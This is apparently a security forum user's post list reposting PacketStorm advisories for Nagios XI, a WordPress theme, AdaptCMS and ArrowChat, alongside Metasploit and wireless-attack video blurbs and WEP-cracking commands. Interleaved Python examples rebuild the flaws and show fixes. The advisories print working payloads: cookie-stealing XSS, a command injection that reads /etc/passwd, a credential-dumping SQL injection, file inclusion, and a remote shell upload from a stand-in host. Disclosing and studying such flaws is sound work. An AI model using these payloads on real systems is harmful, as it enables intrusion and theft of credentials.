
Praetorian503
Active Members
Posts: 578
Days Won: 5

Everything posted by Praetorian503

  1. Nagios XI version 2012R1.5b suffers from cross site request forgery, cross site scripting, remote command injection, and remote SQL injection vulnerabilities.

     Reflected XSS:

     Alert Cloud Component:
     Example URL: http://nagiosxiserver/nagiosxi/includes/components/alertcloud/index.php?width=800"}}; alert('xss'); var aa={"a" : {"b" : "
     The vulnerable code in Alert Cloud's index.php appears to have been copied and pasted into several other components as well.

     Escalation Wizard:
     Example URL: http://nagiosxiserver/nagiosxi/includes/components/escalationwizard/escalationwizard.php?stage=4&config_name=ffffff' style='height:5000px;width:5000px;position:absolute;left:-1px;top:-1px' onmouseover='alert("xss")'/>

     Stored XSS:

     Nagios QL (aka Legacy Nagios Core Configuration Manager):
     Example: Using ');alert('xss as the config name of a host escalation entry will result in the JavaScript being executed when a user tries to delete that host escalation entry. I believe that the Legacy Nagios Core Configuration Manager and the (regular, non-legacy) Core Configuration Manager share configuration settings in a database. I was unable to test whether script injected via Nagios QL could be executed by using the (regular) Core Configuration Manager because the (regular) Core Configuration Manager appears to be broken in this release (?).

     Command Execution:

     Autodiscovery does not filter input properly. Any user can submit new jobs, even regular user accounts with read-only access. Autodiscovery may not appear in the menu for some users; it may be necessary to browse directly to the autodiscovery page.
     Example (as the scan target): \; cat /etc/passwd \;
     Then look at the job results. Due to what seems to be (as far as I can tell) a very poorly thought out sudo rule, a user could upload a custom nmap script to the server and run it (through sudo) for easy root access. Yes, there is a sudo rule that allows apache to run nmap as root.
     Autodiscovery requires manual activation before it can be used (and this vulnerability exploited). Autodiscovery does use a nonce, but this can be bypassed with XSS.

     Not sure what to call this, content spoofing maybe? Whatever you would call it, this could be used for phishing (or whatever).
     Nagios XI Admin Panel: http://172.16.4.51/nagiosxi/admin/?xiwindow=http://w3c.org

     SQL Injection:

     Sorry about the poor examples below, they should be enough to demonstrate the point though.

     NagiosQL (aka Legacy Nagios Core Configuration Manager):
     Example URL: http://nagiosxiserver/nagiosql/admin/commandline.php?cname=a'+or+'a'='a
     Vulnerable Code:
         if (isset($_GET['cname']) && ($_GET['cname'] != "")) {
             $strResult = $myDBClass->getFieldData("SELECT command_line FROM tbl_command WHERE id='".$_GET['cname']."'");
     There are other pages in NagiosQL that are also vulnerable.

     Escalation Wizard:
     Example URL: http://nagiosxiserver/nagiosxi/includes/components/escalationwizard/escalationwizard.php?stage=5&submitted=true&level='

     CSRF:

     NagiosQL (aka Legacy Nagios Core Configuration Manager)
     Escalation Wizard

     Configuration File Injection:

     Example URL: http://nagiosxiserver/nagiosxi/includes/components/escalationwizard/escalationwizard.php?config_name=CoolConfigDD&contacts[]=1&contactgroups[]=1&timeperiod=2&first=1&last=10&interval=1&done=false&stage=5&level=1&objecttype=host&submitted=true&options[]=d%0A}%0Adefine host%0A%23
     The 'options' GET parameter is limited to 20 characters (VARCHAR 20 in the DB) and is placed in the 'escalation_options' field in the hostescalations.cfg file. I'm not sure if it is possible to do anything useful with only 20 characters, but I find it interesting nonetheless. The above example creates an empty host definition that doesn't mess up the config file. If an invalid configuration file is created, the last known good configuration is rolled back and nagios is restarted, so this cannot be used for denial of service.

     James Clawson
     Source: PacketStorm
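The NagiosQL commandline.php query from the advisory above, rebuilt as an added example (not code from the advisory or from Nagios/NagiosQL) over Python's sqlite3 so the cname injection and the lone-quote probe behind the Escalation Wizard level=' URL can be run offline. The table, its rows and the function names are constructed stand-ins; real NagiosQL runs on MySQL, where the same string concatenation has the same effect.

```python
"""Added example (not from the advisory or from Nagios/NagiosQL): the
commandline.php query rebuilt over Python's sqlite3 so the cname injection
can be run offline. Table rows are constructed; real NagiosQL runs on MySQL,
where the same string concatenation has the same effect."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for NagiosQL's tbl_command."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE tbl_command (id INTEGER PRIMARY KEY, command_line TEXT)")
    db.executemany(
        "INSERT INTO tbl_command VALUES (?, ?)",
        [(1, "$USER1$/check_ping -H $HOSTADDRESS$ -w 100,20% -c 500,60%"),
         (2, "$USER1$/check_ssh $HOSTADDRESS$")],
    )
    return db


def get_field_data_vulnerable(db: sqlite3.Connection, cname: str):
    """Mirrors the advisory's code: the GET parameter is spliced into the SQL
    text. Returns the first column of the first row, like getFieldData().
    ORDER BY is added only so the result is deterministic here."""
    sql = "SELECT command_line FROM tbl_command WHERE id='" + cname + "' ORDER BY id"
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def get_field_data_safe(db: sqlite3.Connection, cname: str):
    """Same query with the value bound as a parameter: the quote in the
    payload is data, never SQL syntax."""
    row = db.execute(
        "SELECT command_line FROM tbl_command WHERE id=? ORDER BY id", (cname,)
    ).fetchone()
    return row[0] if row else None


def errors_on_quote(db: sqlite3.Connection, query_fn) -> bool:
    """The probe behind the advisory's level=' example: a lone quote breaks
    the statement in the vulnerable version and is harmless in the safe one."""
    try:
        query_fn(db, "'")
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    db = make_db()
    tautology = "a' or 'a'='a"          # the advisory's cname payload, decoded
    print("vulnerable:", get_field_data_vulnerable(db, tautology))
    print("parameterized:", get_field_data_safe(db, tautology))
    print("lone quote errors (vulnerable):", errors_on_quote(db, get_field_data_vulnerable))
    print("lone quote errors (safe):", errors_on_quote(db, get_field_data_safe))
```

With the tautology payload the concatenated query matches every row and hands back the first command line; the parameterized query compares the literal string against id and returns nothing.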
  2. The WordPress Flash News theme suffers from cross site scripting, denial of service, path disclosure, abuse of functionality, and remote shell upload vulnerabilities.

     Hello list!

     I want to warn you about multiple vulnerabilities in the Flash News theme for WordPress. This is a commercial theme for WP from WooThemes. These are Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service, Arbitrary File Upload and Information Leakage vulnerabilities.

     In 2011 I wrote about Cross-Site Scripting, Full path disclosure, Abuse of Functionality and Denial of Service vulnerabilities in TimThumb and multiple themes for WordPress (http://websecurity.com.ua/4910/), and later an Arbitrary File Uploading vulnerability was also disclosed. After the previous advisory, I wrote another one about multiple themes from WooThemes (http://websecurity.com.ua/5071/) with Information Leakage and Cross-Site Scripting vulnerabilities (only part of their themes were affected). If two years ago I wrote about holes in TimThumb and multiple themes from WooThemes (where I mentioned Flash News), then this time I write directly about this particular theme. And I've also added other holes in it. This is an example for the Flash News theme. In other themes from WooThemes the situation is similar. In the above-mentioned advisory I listed 89 vulnerable themes for WP from WooThemes.

     -------------------------
     Affected products:
     -------------------------

     Vulnerable are all versions of the Flash News theme for WordPress (in the latest versions only the vulnerabilities in thumb.php were fixed). I informed the developers about these vulnerabilities already at the beginning of 2011 (both about holes in TimThumb and about holes in the native scripts in their themes, for WordPress and other engines).

     Two years after I informed the WooThemes developers, there are hundreds of thousands of sites with only the Flash News theme (not mentioning all other themes), according to Google, and all of them are still vulnerable to many of these vulnerabilities. Mostly the holes in thumb.php were fixed, but not in other vulnerable scripts of the theme, and there are many sites which have fixed only part of the holes in TimThumb in the theme. E.g. they fixed the Code Execution (AFU), AoF and DoS holes, but the XSS and FPD holes were left.

     ----------
     Details:
     ----------

     XSS (WASC-08):
     http://site/wp-content/themes/flashnews/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

     Full path disclosure (WASC-13):
     http://site/wp-content/themes/flashnews/thumb.php?src=1
     http://site/wp-content/themes/flashnews/thumb.php?src=http://site/page.png&h=1&w=1111111
     http://site/wp-content/themes/flashnews/thumb.php?src=http://site/page.png&h=1111111&w=1

     Abuse of Functionality (WASC-42):
     http://site/wp-content/themes/flashnews/thumb.php?src=http://site&h=1&w=1
     http://site/wp-content/themes/flashnews/thumb.php?src=http://site.badsite.com&h=1&w=1 (bypass of the restriction on domain, if such a restriction is turned on)

     DoS (WASC-10):
     http://site/wp-content/themes/flashnews/thumb.php?src=http://site/big_file&h=1&w=1
     http://site/wp-content/themes/flashnews/thumb.php?src=http://site.badsite.com/big_file&h=1&w=1 (bypass of the restriction on domain, if such a restriction is turned on)

     About such Abuse of Functionality and Denial of Service vulnerabilities you can read in my article Using of the sites for attacks on other sites (http://lists.grok.org.uk/pipermail/full-disclosure/2010-June/075384.html).

     Arbitrary File Upload (WASC-31) (in unfixed versions of TimThumb):
     http://site/wp-content/themes/flashnews/thumb.php?src=http://site.badsite.com/shell.php

     Full path disclosure (WASC-13):
     http://site/wp-content/themes/flashnews/
     Besides index.php there is also potential FPD in other php-files of this theme.

     Information Leakage (WASC-13):
     http://site/wp-content/themes/flashnews/includes/test.php
     Script with phpinfo.

     XSS (WASC-08):
     http://site/wp-content/themes/flashnews/includes/test.php?a[]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
     This XSS works in PHP < 4.4.1, 4.4.3-4.4.6 (where it was possible to conduct XSS via phpinfo).

     Best wishes & regards,
     MustLive
     Administrator of Websecurity web site
     http://websecurity.com.ua

     Source: PacketStorm
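The "bypass of the restriction on domain" in the advisory above (http://site.badsite.com/ accepted where only http://site/ should be) is what a substring match on the remote URL produces. The block below is an added example, not code from the advisory, from TimThumb or from WooThemes: the weak check is an assumed shape of the bypassed filter, the allowlist is constructed, and "site" stands for the blog's own host exactly as in the advisory's URLs.

```python
"""Added example, not code from the advisory, from TimThumb or from WooThemes:
why a substring match on the remote URL lets http://site.badsite.com/ through
an "allowed domains" restriction, and what a strict host check looks like.
The allowlist is constructed; "site" stands for the blog's own host."""
from urllib.parse import urlsplit

# Constructed allowlist of hosts the thumbnail script may fetch from.
ALLOWED_HOSTS = {"site", "img.site"}


def host_allowed_substring(src: str) -> bool:
    """Weak check (assumed shape of the bypassed filter): accept the URL if an
    allowed name appears anywhere in it. 'site.badsite.com', 'site@badsite.com'
    and '?x=site' all contain 'site'."""
    return any(allowed in src for allowed in ALLOWED_HOSTS)


def host_allowed_strict(src: str) -> bool:
    """Strict check: http(s) only, and the *parsed* host (lowercased by
    urlsplit, trailing dot dropped) must equal an allowlisted name. Userinfo
    tricks ('site@badsite.com') never reach the comparison because hostname
    is taken from the parsed authority, not the raw string."""
    parts = urlsplit(src)
    if parts.scheme not in ("http", "https"):
        return False
    host = (parts.hostname or "").rstrip(".")
    return host in ALLOWED_HOSTS


if __name__ == "__main__":
    # Constructed src values modelled on the advisory's URLs.
    for src in ("http://site/page.png",
                "http://site.badsite.com/big_file",
                "http://site@badsite.com/shell.php",
                "http://badsite.com/shell.php?x=site",
                "1"):
        print(f"{src:40} substring={host_allowed_substring(src)!s:5} strict={host_allowed_strict(src)}")
```

The strict check does not by itself address the other thumb.php issues in the advisory (a non-URL src, oversized w/h values, or a large remote file); those need separate input validation and a size cap on the fetch.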
  3. There's uCoz too. But I still prefer WordPress.
  4. Description: In this video I will show you how to exploit two machines and sniff the traffic from the victim machine. There is one machine available with a different subnet mask; I will add a route, exploit it and use the meterpreter sniffer module for network traffic sniffing. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: Pivoting + Sniffing Network Traffic
  5. Description: In this video I will show you how to use Railgun for post-exploitation. In this demo I will use Railgun for Message Box and Process Terminate. This demo was performed by David Maloney at DEF CON 20: Weaponizing The Windows API With Metasploit's Railgun. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: Post-Exploitation Using Metasploit Railgun
  6. Description: The Executable and Linkable Format (ELF) is omnipresent; related OS and library code is run whenever processes are set up and serviced (e.g., dynamically linked). The loader is the stage manager for every executable. Hardly anyone appreciates the work that the ELF backstage crew (including the linker and the loader) puts in to make an executable run smoothly. While the rest of the world focuses on the star, hackers such as the Grugq (in Cheating the ELF) and Skape (in Locreate: An Anagram for Relocate), and the ERESI/ELFsh crew, know to schmooze with the backstage crew. We can make a star out of the loader by tricking it into performing any computation by presenting it with crafted but otherwise well-formed ELF metadata. We will provide you with a new reason why you should appreciate the power of the ELF linker/loader by demonstrating how specially crafted ELF relocation and symbol table entries can act as instructions to coerce the linker/loader into performing arbitrary computation. We will present a proof-of-concept method of constructing ELF metadata to implement the Turing-complete Brainfuck language primitives, as well as demonstrate a method of crafting relocation entries to insert a backdoor into an executable. Rebecca "bx" Shapiro is a graduate student at a small college in Northern Appalachia. She enjoys tinkering with systems in undocumented manners to find hidden sources of computation. She hopes to continue this work to find more specimens for Sergey Bratus's weird machine zoo. Twitter: @bxsays Sergey Bratus is a Northern Appalachian who hacks DWARF and ELF. It is his ambition to collect and classify all kinds of weird machines; he is also a member of the Language-theoretic Security conspiracy to eliminate large classes of bugs. Twitter: @sergeybratus Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: Programming Weird Machines With ELF Metadata
  7. Description: OpenDLP is a free and open source agent-based data discovery tool that works against Microsoft Windows systems using appropriate authentication credentials. However, one drawback to OpenDLP is that its policy-driven approach makes it arduous to scan disjointed systems that are not part of a Windows domain or do not share the same authentication credentials. To fix this, OpenDLP can now launch its agents over Meterpreter sessions using Metasploit RPC without requiring domain credentials. Andrew Gavin, creator of OpenDLP, is an information security consultant at Verizon Business. He has more than 12 years of experience in security assessments of networks and applications. He has consulted for numerous customers in various industries around the world. Twitter: @OpenDLP (project), @andrewgavin (personal) Michael Baucom is the VP of Engineering at N2 Net Security. Michael has taught classes on exploit development and was the technical editor for Gray Hat Hacking: The Ethical Hacker's Handbook. He has worked in development for over 15 years in various industries. While at N2 Net Security he has worked on a wide variety of projects including software security assessments, tool development, and penetration tests. Charles Smith is a graduate of North Carolina State University, and has been building credit card software and developer tools and modules for the last ten years. Recently he has joined N2 Net Security, and has put his skills to ferreting out security vulnerabilities and building new tools to help penetration testers do their jobs more efficiently. He specializes in C++, but is also well-versed in Java, .NET, VB, and Perl. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: Post-Exploitation Nirvana: Launching OpenDLP Agents Over Meterpreter Sessions
  8. Description: Recognizing a need to support passive Bluetooth monitoring in Scapy, Python's interactive monitoring framework, a project was launched to produce this functionality. Through this functionality, a new means for interactively observing Bluetooth was created along with Python APIs to assist in the development of Bluetooth auditing, pentesting and exploitation tools. The project supplements the work of Michael Ossmann et al. by providing Python extensions and Scapy modules which interact with an Ubertooth dongle. The project also provides support for other passive Bluetooth techniques not present in the current Ubertooth core software such as NAP identification, vendor lookup, extended logging and more. In conjunction with this presentation, the source for this project will be released along with distribution packages for easy installation. Ryan Holeman resides in Austin, Texas, where he works as a software developer specializing in backend services. He has a Master of Science in Software Engineering and has published papers through ICSM and ICPC. His spare time is mostly spent digging into various network protocols and shredding local skateparks. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: Passive Bluetooth Monitoring In Scapy
  9. www.youtube.com/watch?v=W3AfKOvwSNw
     Description: In this video I will show you how to crack a WEP key using the aircrack-ng suite. The attack method is arpreplay.
     Steps:
     1 - Start monitor mode
     2 - Start writing data using airodump-ng
     3 - Use aireplay-ng for arpreplay
     4 - If you don't get packets, perform a deauth attack.
     ------
     1 - airmon-ng start wlan0
     2 - airodump-ng --bssid XX:XX:XX:XX:XX:XX --channel X --write (Name) mon0
     3 - aireplay-ng --arpreplay -b XX:XX:XX:XX:XX:XX -h XX:XX:XX:XX:XX:XX mon0
     (-b takes the AP's BSSID and -h the source MAC to replay from; -e would expect the ESSID, not a MAC address.)
     Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: Cracking WEP Encryption Manually
  10. Description: In this video I will show you how to use the hwk wireless exploitation tool. This tool is powered by nullsecurity.net and developed by atzeton. In this demo I will cover some interesting features like beacon flood, fuzzing, deauth etc. hwk is an easy-to-use wireless authentication and deauthentication tool. Furthermore, it also supports probe response fuzzing, beacon injection flooding, antenna alignment and various injection testing modes. Information gathering is selected by default and shows the incoming traffic, indicating the packet types. nullsecurity Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: Hwk Wireless Exploitation Tool
  11. AdaptCMS versions 2.0.4 and below suffer from a remote SQL injection vulnerability.

      # Exploit Title: AdaptCMS <= 2.0.4 SQL Injection vulnerability
      # Date: 26/10/2012
      # Exploit Author: Kallimero
      # Vendor Homepage: http://www.adaptcms.com/
      # Software Link: http://www.insanevisions.com/page/3/Downloads/
      # Version: 2.0.4
      # Tested on: Debian

      Introduction
      ============
      As you know, I love fun and tricky SQL injections. AdaptCMS is vulnerable to a really unusual one.

      The vuln
      ========
      First let's see the code:

      ---------------[config.php]---------------
      Line 34:
      array_map('clean', $_POST);
      ---------------[config.php]---------------

      clean() acts like addslashes. But a couple of lines after:

      ---------------[config.php]---------------
      Line 111:
      mysql_query("INSERT INTO ".$pre."polls VALUES (null, '".htmlentities(check($vote[2]))."', '".$vote2."', 'custom_option', '', '".htmlentities(urldecode($_POST['question']))."', 1, '".time()."')");
      ---------------[config.php]---------------

      w00t, an SQL injection. $_POST['question'] is urldecoded after the superglobal's clean. That's why we can easily inject our SQL request. (Without ENT_QUOTES, the single quote passes through htmlentities().)

      The PoC
      =========
      Ok, now we have to add a second INSERT query, to insert a custom choice in the poll, which obviously contains the admin credentials. A simple POST HTTP request such as:

      article_id=0&poll_id=1&vote=2&custom=1&question=%2527, 1, 1350677660), (null, 0, (select concat(username, 0x3a, password) from adapt_users), 'option', '', 1, 1337, 1349597648 )-- -

      Now check the homepage, and enjoy the admin credentials.

      How to Fix?
      ============
      There are many SQL injections in this CMS ($_SERVER vars are vulnerable as well), and other funky vulnz. Changing your CMS seems appropriate until they fix those issues.

      Thanks
      =========
      All hwc members: Necromoine, fr0g, AppleSt0rm, St0rn, Zhyar, k3nz0, gr4ph0s.
      Please visit: http://www.orgasm.re/

      Source: PacketStorm
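The ordering bug in the advisory above (clean()/addslashes runs over $_POST on line 34, urldecode() runs on the field on line 111) can be watched step by step. The block below is an added example, not AdaptCMS code: each PHP step gets a Python stand-in, the INSERT shape is a constructed approximation of the polls query, and the payload is a constructed variant of the advisory's with every quote written as %27 so that addslashes has nothing to escape. Note that PHP has already URL-decoded the POST body once, so a `%2527` on the wire reaches $_POST['question'] as `%27`.

```python
"""Added example, not AdaptCMS code: Python stand-ins for the three PHP steps
config.php applies to $_POST['question'], in the order it applies them, so the
double-encoded quote can be watched come back to life. The INSERT shape and
the payload are constructed for the example."""
from urllib.parse import unquote

# What PHP hands config.php in $_POST['question'] after its own single decode
# (on the wire every %27 below was %2527). Constructed variant of the advisory's
# payload in which every quote is double-encoded, so clean() leaves it alone.
PAYLOAD = ("%27, 1, 1350677660), (null, 0, "
           "(select concat(username, 0x3a, password) from adapt_users), "
           "%27option%27, %27%27, 1, 1337, 1349597648)-- -")


def addslashes(s: str) -> str:
    """PHP addslashes(): backslash before ' \" \\ and NUL. The advisory says
    clean() behaves like this."""
    return "".join("\\" + c if c in "'\"\\" else ("\\0" if c == "\x00" else c)
                   for c in s)


def htmlentities_default(s: str) -> str:
    """PHP htmlentities() without ENT_QUOTES: & < > and the double quote are
    encoded, the single quote is not (the point the advisory makes)."""
    return (s.replace("&", "&amp;").replace("<", "&lt;")
             .replace(">", "&gt;").replace('"', "&quot;"))


def question_as_config_php(post_value: str) -> str:
    """Bug order from line 34 / line 111: escape first, then urldecode."""
    return htmlentities_default(unquote(addslashes(post_value)))


def question_decode_then_escape(post_value: str) -> str:
    """Ordering fix: decode before escaping, so the escaper sees the real quote.
    (Binding the value as a query parameter is the proper fix; this keeps the
    page's escaping approach only to isolate the ordering problem.)"""
    return htmlentities_default(addslashes(unquote(post_value)))


def build_insert(question: str) -> str:
    """Constructed stand-in for the polls INSERT; only the question column matters."""
    return ("INSERT INTO adapt_polls VALUES (null, 'title', 'v2', 'custom_option', '', '"
            + question + "', 1, '0')")


def unescaped_quotes(s: str) -> int:
    """Count single quotes not preceded by a backslash: any such quote inside a
    value that is spliced into SQL text closes the string literal."""
    return sum(1 for i, c in enumerate(s)
               if c == "'" and (i == 0 or s[i - 1] != "\\"))


if __name__ == "__main__":
    vuln = question_as_config_php(PAYLOAD)
    fixed = question_decode_then_escape(PAYLOAD)
    print("config.php order, live quotes:", unescaped_quotes(vuln))
    print("decode-then-escape, live quotes:", unescaped_quotes(fixed))
    print(build_insert(vuln))
```

In the config.php order the five quotes hidden behind %27 survive addslashes and are restored by urldecode, so the built INSERT contains a second value tuple with the subquery against adapt_users and a trailing comment. Decoding first gives addslashes the chance to escape all five.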
  12. ArrowChat versions 1.5.61 and below suffer from cross site scripting and local file inclusion vulnerabilities.

      # Exploit Title: ArrowChat <=~ 1.5.61 Multiple vulnerabilities
      # Date: 01/01/2013
      # Exploit Author: Kallimero
      # Vendor Homepage: http://www.sitexcms.org/
      # Version: 1.5.61, before, and maybe 1.6
      # Tested on: Debian

      Introduction
      ============
      ArrowChat is a chat script which can be integrated in various CMSs, such as WordPress, or some bulletin boards.

      Vulnz
      ========
      1- ) Local File Inclusion

      external.php lets us load a language, but not in a secure way.

      ---------------[external.php]---------------
      // Load another language if lang GET value is set and exists
      if (var_check('lang')) {
          $lang = get_var('lang');
          if (file_exists(dirname(__FILE__) . DIRECTORY_SEPARATOR . AC_FOLDER_LANGUAGE . DIRECTORY_SEPARATOR . $lang . DIRECTORY_SEPARATOR . $lang . ".php")) {
              include (dirname(__FILE__) . DIRECTORY_SEPARATOR . AC_FOLDER_LANGUAGE . DIRECTORY_SEPARATOR . $lang . DIRECTORY_SEPARATOR . $lang . ".php");
          }
      }
      ---------------[external.php]---------------

      Thanks to the null byte trick we'll be able to include any php file, like that:
      http://[site]/[path]/external.php?lang=../path/to/file%00&type=djs

      2- ) Reflected XSS

      The administration layout is accessible to anyone. Even if we can't exec the PHP code of the admin, we can inject HTML thanks to $_SERVER['PHP_SELF'].

      Example:
      -------[admin/layout/pages_general.php]-----
      <form method="post" action="<?php echo $_SERVER['PHP_SELF']; ?>?do=<?php echo $do; ?>" enctype="multipart/form-data">
      ----------------------------------

      PoC:
      http://[site]/[path]/admin/layout/pages_general.php/'"/><script>alert(1);</script>

      How to Fix?
      ============
      To fix the LFI, you can replace it with:

      // Load another language if lang GET value is set and exists
      if (var_check('lang')) {
          $lang = get_var('lang');
          if (preg_match("#^[a-z]{2,5}$#i", $lang)) {
              if (file_exists(dirname(__FILE__) . DIRECTORY_SEPARATOR . AC_FOLDER_LANGUAGE . DIRECTORY_SEPARATOR . $lang . DIRECTORY_SEPARATOR . $lang . ".php")) {
                  include (dirname(__FILE__) . DIRECTORY_SEPARATOR . AC_FOLDER_LANGUAGE . DIRECTORY_SEPARATOR . $lang . DIRECTORY_SEPARATOR . $lang . ".php");
              }
          }
      }

      lang will be included only if it's a valid lang file. For the XSSs, you can use a .htaccess to protect the layout directory, and use htmlentities to avoid the HTML injection.

      Thanks
      =========
      All hwc members: Necromoine, fr0g, AppleSt0rm, St0rn, Zhyar, k3nz0, gr4ph0s.
      Please visit: http://www.orgasm.re/

      Source: PacketStorm
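The language lookup from the advisory above, as an added example in Python rather than ArrowChat's PHP: first the unvalidated path construction, then the advisory's regex allowlist combined with a containment check on the resolved path. One caveat the example encodes: in PCRE (and Python's re) `$` also matches just before a trailing newline, so the advisory's `#^[a-z]{2,5}$#i` accepts "en\n" unless the D modifier is added; the Python version uses fullmatch() for that reason. The directory layout and language names are constructed for the example.

```python
"""Added example, not ArrowChat code: the external.php language lookup as a
Python function, first unvalidated as in the advisory, then guarded by the
advisory's regex allowlist plus a check that the resolved path stays under the
language directory. The directory layout is constructed for the example."""
import os
import re
import tempfile

# The advisory's fix, #^[a-z]{2,5}$#i. fullmatch() is used instead of match()
# because in both PCRE and Python's re, '$' also matches before a trailing
# newline, so "en\n" would slip past match() / preg_match() as written.
LANG_RE = re.compile(r"[a-z]{2,5}", re.I)


def lang_path_unvalidated(lang_dir: str, lang: str) -> str:
    """What the vulnerable code builds: <lang_dir>/<lang>/<lang>.php. A NUL in
    lang ends the C string early in PHP's file functions, so '../x%00'
    resolves to <lang_dir>/../x and the trailing '/<lang>.php' never applies."""
    return os.path.join(lang_dir, lang, lang + ".php")


def resolve_lang_file(lang_dir: str, lang: str):
    """Return the language file to include, or None.
    1. lang must be a bare 2-5 letter code (stops '../', NUL, separators);
    2. the real path must still be inside lang_dir (stops symlinked entries);
    3. the file must exist, as the original file_exists() check requires."""
    if not LANG_RE.fullmatch(lang):
        return None
    base = os.path.realpath(lang_dir)
    candidate = os.path.realpath(os.path.join(base, lang, lang + ".php"))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate if os.path.isfile(candidate) else None


def build_lang_dir() -> str:
    """Constructed language directory holding one valid language, 'en'."""
    d = tempfile.mkdtemp()
    os.makedirs(os.path.join(d, "en"))
    with open(os.path.join(d, "en", "en.php"), "w", encoding="utf-8") as f:
        f.write("<?php $lang_name = 'English';\n")
    return d


if __name__ == "__main__":
    d = build_lang_dir()
    for lang in ("en", "fr", "en\n", "../path/to/file\x00"):
        print(repr(lang), "->", resolve_lang_file(d, lang))
    print("unvalidated:", repr(lang_path_unvalidated(d, "../path/to/file\x00")))
```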
  13. Description: Welcome to Part 5 of the Aircrack-ng Megaprimer series! In this video, I will be discussing the tool airbase-ng, which is used for client-side attacks as opposed to the AP attacks seen thus far. If you have any questions, comments or suggestions, please feel free to leave them in the comment section below! Thanks! Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: Aircrack-Ng Megaprimer Part 5: Airbase-Ng
  14. Description: Man in the middle attacks are still one of the most powerful techniques for owning machines. In this talk MITM schemes in anonymous services are going to be discussed. Then attendees will see how easily a botnet using JavaScript can be created to analyze that kind of connection and some of the actions the people behind those services are doing... for real. It promises to be funny. Chema Alonso is a security researcher with Informatica64, a Madrid-based security firm. Chema holds respective Computer Science and System Engineering degrees from Rey Juan Carlos University and Universidad Politècnica de Madrid. During his more than eight years as a security professional, he has consistently been recognized as a Microsoft Most Valuable Professional (MVP). Chema is a frequent speaker at industry events (Microsoft Technet / Security Tour, AseguraIT) and has been invited to present at information security conferences worldwide including Yahoo! Security Week, Black Hat Briefings, ShmooCON, DeepSec, HackCON, Ekoparty and RootedCon. He is a frequent contributor to several technical magazines in Spain, where he is involved with state-of-the-art attack and defense mechanisms, web security, general ethical hacking techniques and FOCA. Twitter: @chemaalonso Un informático en el lado del mal Informática 64 Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: Owning Bad Guys {And Mafia} With Javascript Botnets
  15. Description: Their systems were fully patched, their security team watching, and the amateur pentesters had just delivered their "compliant" report. They thought their Windows domain was secure. They thought wrong. Zack Fasel (played by none other than Angelina Jolie) brings a new tool along with new methods to obtain Windows Integrated Authentication network requests and perform NTLM relaying both internally and externally. The goal? Start off as a nobody and get domain admin (or sensitive data/access) in 60 seconds or less on a fully patched and typically secured Windows environment. The grand finale? Zack demonstrates the ability to *externally* gain access to a Windows domain user's Exchange account simply by sending them an email, along with tips on how to protect yourself from these attacks. In just one click of a link, one view of an email, or one wrong web request, this new toolset steals the identity of targeted users and leverages their access. Call your domain admins, hide your road warriors, and warn your internal users. Zack will change the way you think about Windows Active Directory security and trust relationships, driving you to further harden your systems and help you sleep at night. Owned in 60 Seconds. Coming This Summer. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: Owned In 60 Seconds: From Network Guest To Windows Domain Admin
  16. Description: Before they were a team, the members of project SPAN thought it was highly limiting to only be able to network smart phones over standard Wi-Fi or with a cellular infrastructure. Honestly, the SPAN team isn't a big fan of infrastructure-based networks in general. They wanted a headless, dynamic network that allowed for resilient communications when the other infrastructure either wasn't available or when they just didn't feel like using it. They also really liked the idea of a communication system where there was no central router, server or other central point of sniffing of data. With this in mind, they teamed up and created project SPAN (Smart Phone AdHoc Networks). They decided to open source the project and to share not only the code (initial release to coincide with the presentation) but also the whole process and idea with the community at large. The team is annoyed that the current generation smart phone radios have the intrinsic ability to communicate directly with one another, but hardware vendors and mobile OS frameworks don't make it easy to do so. Let us show you how it can be done and the fun that can be had from it. Join the SPAN team for a deep dive into the Android network stack implementation and its limitations, an analysis of the Wi-Fi chipsets in the current generation of smart phones and a collection of lessons learned when writing your own network routing protocol (or 5 of them). The team will also share a "How To" walkthrough on implementing your own mesh network and incorporating general "Off Grid" concepts into your next project; this will include securing your mesh from outside parties while tunneling and bridging through the internet. The team will delve into specific Android limitations of ad-hoc networking and provide workarounds and bypass mechanisms. Lastly, the team will give an overview of the implementations and network surfaces provided by the new collection of networking alternatives, including NFC and Wi-Fi Direct. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: Off-Grid Communications With Android: Meshing The Mobile World
